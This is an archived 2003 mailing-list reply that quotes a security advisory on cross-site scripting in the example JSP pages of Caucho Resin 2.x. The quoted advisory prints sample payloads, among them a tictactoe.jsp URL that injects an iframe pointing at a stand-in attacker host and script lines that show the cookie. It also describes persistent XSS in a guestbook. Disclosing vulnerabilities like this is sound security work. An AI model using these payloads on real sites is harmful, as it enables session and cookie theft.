lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
From: jkuperus at planet.nl (jelmer) Subject: Caucho Resin 2.x - Cross Site Scripting Donny, These are in the example applications, which any sane admin should disable right away, much like caucho-status These are basic procedures in setting up a server. --jelmer ----- Original Message ----- From: "morning_wood" <se_cur_ity@...mail.com> To: <full-disclosure@...ts.netsys.com> Sent: Sunday, October 19, 2003 12:37 PM Subject: [Full-Disclosure] Caucho Resin 2.x - Cross Site Scripting > ----------------------------------------------------------------- > - EXPL-A-2003-026 exploitlabs.com Advisory 026 - > ----------------------------------------------------------------- > -= Caucho Resin =- > > > Donnie Werner > Oct 18, 2003 > > > > Vunerability(s): > ---------------- > 1. XSS > > > note: this is not > > http://www.securiteam.com/securitynews/5KP0O1F7FM.html > http://www.securitytracker.com/alerts/2002/Jun/1004552.html > > > Product: > -------- > Caucho Resin Httpd 2.x > > Reviews: > -------- > http://www.caucho.com/sales/customers.xtp > > > Description of product: > ----------------------- > "Resin? is a cutting-edge XML Application Server. > It serves the fastest servlets and JSP." > > > VUNERABILITY / EXPLOIT > ====================== > default port 8080 ( others used ) > > affected scripts: > env.jsp > form.jsp > session.jsp > tictactoe.jsp > > http://[host]:8080/examples/tictactoe/tictactoe.jsp?move=<iframe%20src="http://attcker/evil.cgi"></iframe>4 > or > <SCRIPT>alert(document.domain);</SCRIPT><SCRIPT>alert(document.cookie);</SCR > IPT> > > the above is only an example, all cookie and session > stealing Cross Site Scripting was possible. > > > guestbook.jsp allows persistant XSS > > enter evil javascript in "name" and "comment" fields > it is then re-rendered upon revisit > > > > > Local: > ------ > nay > > Remote: > ------- > yeh > > > Vendor Fix: > ----------- > Versions 3.x dont have the examples included > > > > Vendor Contact: > --------------- > bugs@...cho.com > Concurrent with this advisory > > > Credits: > -------- > Donnie Werner > CTO E2 Labs > http://e2-labs.cpm > morning_wood@...labs.com > > http://nothackers.org > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html
Powered by blists - more mailing lists